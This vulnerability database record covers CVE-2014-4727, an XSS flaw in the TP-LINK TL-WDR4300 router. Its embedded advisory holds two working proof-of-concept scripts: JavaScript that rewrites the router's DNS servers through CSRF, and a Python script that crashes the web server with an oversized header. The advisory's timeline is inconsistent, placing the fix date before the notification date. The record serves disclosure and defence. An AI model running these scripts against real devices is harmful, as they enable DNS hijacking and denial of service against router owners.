ID
VAR-201409-0077
CVE
CVE-2014-4727
TITLE
TP-LINK N750 Wireless Dual Band Gigabit Router firmware DHCP Cross-site scripting vulnerability in client page
Trust: 0.8
DESCRIPTION
Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. Allows an attacker to exploit this vulnerability to execute arbitrary HTML or script code in the browser of an uninformed user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Advisory Information =============== Vendors Contacted: TP-LINK Vendor Patched: Yes, Firmware 140916 System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others. # DoS (web server) - Denial of service condition to the device web server, remotely or locally send the device a "GET" request with an extra "Header" with a long value (A x 3000 times). Proof of Concept: ============ http://elisyan.com/tplink/wdr4300.html ---- start wdr4300.html ---- /* Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) */ var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send(); ---- end wdr4300.html ---- http://elisyan.com/tplink/wdr4300.py ---- start wdr4300.py ---- #Author: Oz Elisyan #TP-Link WDR4300 DoS PoC import httplib conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} conn.request("GET","/", "Let me tell you something", headers) print "Done" ---- end wdr4300.py ---- Report Timeline: =========== 2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information. 2013-09-16: Vendor released a fix. Credits: ====== The Vulnerabilities was discovered by Oz Elisyan. References: ======== http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
Trust: 2.61
IOT TAXONOMY
| category: | ['Network device'] | sub_category: | - | Trust: 0.6 |
AFFECTED PRODUCTS
| vendor: | tp link | model: | tl-wdr4300 | scope: | lte | version: | 130617 | Trust: 1.0 |
| vendor: | tp link | model: | tl-wdr4300 | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | tp link | model: | tl-wdr4300 | scope: | - | version: | - | Trust: 0.8 |
| vendor: | tp link | model: | tl-wdr4300 | scope: | lt | version: | 140916 | Trust: 0.8 |
| vendor: | tp link | model: | wdr4300 running | scope: | eq | version: | 130617 | Trust: 0.6 |
| vendor: | tp link | model: | tl-wdr4300 | scope: | eq | version: | 130617 | Trust: 0.6 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-79 | Trust: 1.9 |
THREAT TYPE
remote
Trust: 0.6
TYPE
xss
Trust: 0.7
CONFIGURATIONS
PATCH
| title: | TL-WDR4300 | url: | http://www.tp-link.com/lk/products/details/?model=TL-WDR4300 | Trust: 0.8 |
| title: | TP-LINK WDR4300 HTML Injection Vulnerability Patch | url: | https://www.cnvd.org.cn/patchInfo/show/50289 | Trust: 0.6 |
| title: | TL-WDR4300_v1_140916 | url: | http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=56684 | Trust: 0.6 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-4727 | Trust: 3.5 |
| db: | BID | id: | 70037 | Trust: 2.6 |
| db: | PACKETSTORM | id: | 128343 | Trust: 1.8 |
| db: | JVNDB | id: | JVNDB-2014-004485 | Trust: 0.8 |
| db: | CNVD | id: | CNVD-2014-06261 | Trust: 0.6 |
| db: | XF | id: | 96139 | Trust: 0.6 |
| db: | CNNVD | id: | CNNVD-201409-1169 | Trust: 0.6 |
| db: | VULHUB | id: | VHN-72668 | Trust: 0.1 |
REFERENCES
| url: | http://seclists.org/fulldisclosure/2014/sep/80 | Trust: 2.5 |
| url: | http://www.securityfocus.com/bid/70037 | Trust: 2.3 |
| url: | http://packetstormsecurity.com/files/128343/tp-link-wdr4300-xss-denial-of-service.html | Trust: 1.7 |
| url: | http://www.securityfocus.com/archive/1/533501/100/0/threaded | Trust: 1.1 |
| url: | http://www.securityfocus.com/archive/1/533499/100/0/threaded | Trust: 1.1 |
| url: | https://exchange.xforce.ibmcloud.com/vulnerabilities/96139 | Trust: 1.1 |
| url: | http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4727 | Trust: 0.8 |
| url: | http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4727 | Trust: 0.8 |
| url: | http://www.securityfocus.com/archive/1/archive/1/533499/100/0/threaded | Trust: 0.6 |
| url: | http://www.securityfocus.com/archive/1/archive/1/533501/100/0/threaded | Trust: 0.6 |
| url: | http://xforce.iss.net/xforce/xfdb/96139 | Trust: 0.6 |
| url: | http://elisyan.com/tplink/wdr4300.py | Trust: 0.1 |
| url: | http://elisyan.com/tplink/wdr4300.html | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-4728 | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-4727 | Trust: 0.1 |
| url: | http://www.tp-link.com/lk/products/details/?model=tl-wdr4300 | Trust: 0.1 |
CREDITS
Oz Elisyan
Trust: 0.4
SOURCES
| db: | CNVD | id: | CNVD-2014-06261 |
| db: | VULHUB | id: | VHN-72668 |
| db: | BID | id: | 70037 |
| db: | JVNDB | id: | JVNDB-2014-004485 |
| db: | PACKETSTORM | id: | 128343 |
| db: | CNNVD | id: | CNNVD-201409-1169 |
| db: | NVD | id: | CVE-2014-4727 |
LAST UPDATE DATE
2025-04-13T23:31:37.568000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2014-06261 | date: | 2014-09-24T00:00:00 |
| db: | VULHUB | id: | VHN-72668 | date: | 2018-10-09T00:00:00 |
| db: | BID | id: | 70037 | date: | 2014-09-25T00:02:00 |
| db: | JVNDB | id: | JVNDB-2014-004485 | date: | 2014-10-02T00:00:00 |
| db: | CNNVD | id: | CNNVD-201409-1169 | date: | 2014-10-08T00:00:00 |
| db: | NVD | id: | CVE-2014-4727 | date: | 2025-04-12T10:46:40.837 |
SOURCES RELEASE DATE
| db: | CNVD | id: | CNVD-2014-06261 | date: | 2014-09-24T00:00:00 |
| db: | VULHUB | id: | VHN-72668 | date: | 2014-09-30T00:00:00 |
| db: | BID | id: | 70037 | date: | 2014-09-21T00:00:00 |
| db: | JVNDB | id: | JVNDB-2014-004485 | date: | 2014-10-02T00:00:00 |
| db: | PACKETSTORM | id: | 128343 | date: | 2014-09-22T18:32:22 |
| db: | CNNVD | id: | CNNVD-201409-1169 | date: | 2014-09-30T00:00:00 |
| db: | NVD | id: | CVE-2014-4727 | date: | 2014-09-30T16:55:06.607 |